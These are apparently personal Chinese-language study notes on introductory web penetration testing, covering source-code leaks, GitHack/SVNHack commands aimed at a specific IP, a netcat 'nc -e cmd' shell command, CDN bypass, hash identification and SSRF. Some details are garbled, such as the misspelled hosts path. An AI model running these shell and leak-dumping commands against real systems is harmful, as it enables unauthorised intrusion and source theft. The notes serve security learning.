汇总一下这几天的笔记
名词解释
POC 漏洞证明代码 EXP(Exploit)利用,利用漏洞进行攻击的动作 Payload有效载荷,指成功exploit之后真正在目标系统执行的代码或指令(shellcode是payload的一种)
公网ip与内网ip
公网IP
公网ip全球唯一,是由网络供应商分配的外网地址,可以直接访问互联网,但是安全风险大,访问速度快而稳定
内网IP
内网IP是在私有网络范围内路由器和使用,通常由路由器和交换机分配,需要用网络地址转换(NAT)来访问互联网资源
思路
1.给你的目标bbs.lkd.com尝试对服务下的edu.lkd.com进行安全测试 2.www.baidu.com dz论坛 www.baidu.com/blog wp程序 www.baidu.com:5050 zblog程序 一个网站 两个程序 任何一个程序出现漏洞 都可以进入安全测试 源码获取很重要
源码获取
CMS识别(云悉指纹识别平台)
其中有网页系统模板,可得到某些网站源码(云悉互联网WEB资产在线梳理)
备份文件泄露
www.zip www.rar ../是用来访问文件父目录(前提是在../在源码中能别执行) C: │ └───Users │ └───YourName │ ├───Documents │ └───Project │ └───Downloads 如果你在 Project
目录中,并且想要访问 Downloads
目录,你可以使用以下路径:../Downloads 在Web开发中,../
也用于构建URL路径。例如,如果你的Web服务器的根目录是 /var/www/html
,并且你想要从子目录 /images
访问根目录下的 index.html
文件,你可以在URL中使用 ../
:http://example.com/images/../index.html
git源码泄露
在执行git init
初始化目录时,会在当前目录下自动创建一个.git
目录用来记录代码的变更记录 在网站域名后加/.git/
出现403说明此目录存在,可用githack扫描
Githack
用cmd转到Githack目录输入Githack.py http://121.36.49.234/.git/
.svn泄露
SVN是一个开放源代码的版本控制系统 ,在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息可利用/.svn/entries
文件获取服务器源码
SVNHack漏洞利用工具
用cmd转到SVNHack目录输入svnhack.py -u http://121.36.49.234/.svn/entries --download
Netcat
nc -lvvp 127.0.0.1 8080 监听自己的8080端口 nc -e cmd 127.0.0.1 8080 打开127.0.0.1:8080的cmd
Ping
可通过TTL值判断操作系统种类 Linux是64或255 Windows是32或128 UNIX是255 TTL值离哪个值近就是哪个操作系统
封包抓包
抓包封包的区别http与tcp
零散(封包)整体(抓包)的区别,封包能精确到每个操作的数据包,抓包要进行筛选
抓包
抓包应用的资产信息进行安全测试,抓包对象为小程序,APP,桌面应用等;抓包用到不同工具是因为有部分应用不走HTTP/S(用bp,转到网站上进行测试),需要用到全局协议(TCP,用科莱,给IP地址或其他的资产信息,扫IP服务器)抓包
BurpSuit
用户每在网页上做出一定操作都会向服务器发送请求包,burp可以拦截并修改这个请求包,实现理想回显 文件夹4031存在404不存在 文件200存在404不存在 3XX跳转 处置过程 可有可无 5XX内部错误 服务器问题 可有可无 设置代理 -> 运行工具的本地IP端口,可抓包APP,小程序,Web网页(测试其安全性)(一次操作发送一次数据包http协议)
[1] 存在但禁止访问
科来
不需要配置任何东西,抓网络接口(TCP2协议) 游戏APP需要不断发送数据包来维持画面流畅 获取服务器的IP地址用bp抓包
[2] TCP将数据视为连续的字节流,而不是独立的数据包。
封包
加密解密算法
识别算法编码类型:
-
看密文位数
-
看密文特征(数字大小写符号)
-
看密文存在的地方(Web,数据库,操作系统等应用)
解密
MD5(网站常用加密方式)
32或16位由数字0~9和a-f所组成的字符串 不可逆(解密:枚举 碰撞),解密不能直接通过算法解,尝试生成很多加密或对应明文的字符去枚举
discuz md5(md5(password).salt)
base64(由0-9大小写字母,‘+ /’组成,大小写敏感以”=“结尾)
URL编码由0-9,a-f以%间隔
HEX编码将数据进行十六进制转换,0-9,A-F
JS前端加密
js颜文字 jother jsfuck
js颜文字
颜文字特征:一堆颜文字构成的JS代码,在F12中直接解密执行
jother特征:
只用!+ ( ) [ ] { }这八个字符 可在F12中解密
JSFUCK:
与jother很想,只是少了 { }
后端代码加密
PHP:乱码,头部有信息 .NET: DLL封装代码文件(只能在Windows上跑) Java:JAR CLASS 文件
数据库密文加密:
MYSQL MSSQL等
CDN(内容分发网络)绕过
源站使用CDN向各个地区的CDN发送内容,当地查询的ip是cdn节点IP也起到加速作用,可通过CDN查询以及get-site-ip.com查询ip
漏洞遗留文件
利用phpinfo.php中显示服务器的本地地址(没有内网网卡)
内网网卡
-
IP地址分配:
-
内网网卡通常被分配一个私有IP地址,这些地址在互联网上不是唯一的,仅在私有网络内部使用。
-
-
网络隔离:
-
内网网卡通常用于隔离内部网络,以保护网络不受外部攻击。
-
-
数据传输:
-
内网网卡负责在局域网内传输数据,如文件共享、打印机共享等。
-
-
网络设备连接:
-
内网网卡可以连接到路由器、交换机、无线接入点等网络设备。
-
-
网络协议支持:
-
内网网卡支持多种网络协议,如TCP/IP、Ethernet、Wi-Fi等。
-
-
安全性:
-
内网网卡可能包含一些安全功能,如虚拟局域网(VLAN)支持,以进一步隔离网络流量。
-
SSRF漏洞(服务器端请求伪造)
通过对方服务器请求本机上的服务,来获取目标服务器的权限,属于反向链接
SSRF漏洞的原理通常涉及以下几个步骤:
-
用户输入:
-
攻击者在Web应用程序的某个输入字段中输入恶意构造的URL。这个URL可能是攻击者想要服务器访问的外部资源。
-
-
应用程序处理:
-
应用程序接收到用户输入后,可能会执行一些操作,如发送HTTP请求、读取远程文件等。如果应用程序没有对输入的URL进行严格的验证和限制,攻击者就可以控制请求的目标。
-
-
服务器端请求:
-
服务器端的应用程序会根据用户输入的URL发起请求。如果应用程序没有正确地处理这个URL,攻击者就可以让服务器执行他们想要的操作。
-
-
数据泄露或服务中断:
-
通过SSRF漏洞,攻击者可以访问内部网络资源、执行未授权的操作、泄露敏感信息,甚至可能导致服务中断。
SSRF攻击的一些常见形式包括:
-
内网探测:攻击者可能利用SSRF漏洞来探测内部网络,例如,通过发送请求到内部服务器的特定端口,以确定内部网络的结构和配置。
-
利用第三方服务:攻击者可能利用SSRF漏洞来执行对第三方服务的攻击,例如,通过发送恶意请求到支付网关,可能导致交易失败或数据泄露。
-
数据泄露:攻击者可能利用SSRF漏洞来访问和窃取服务器上的敏感数据,例如,通过请求内部API或服务。
-
主动邮件和网络备案
先在ip查询网站上查网页ip,一般别人网站的邮件都是从真实ip地址发送过来的(可通过忘记密码让服务器向客户端发送邮件),再配合网页最下方的网络备案(京津冀)可知晓服务器IP
CDN绑定(hosts绑定指向访问)
Windows C:\Windows\System32\dricer\etc\hosts
Linux /etc/hosts
在源文件的子目录中有hosts文件,其中详细记录着每个网站对应的ip(域名由hosts决定)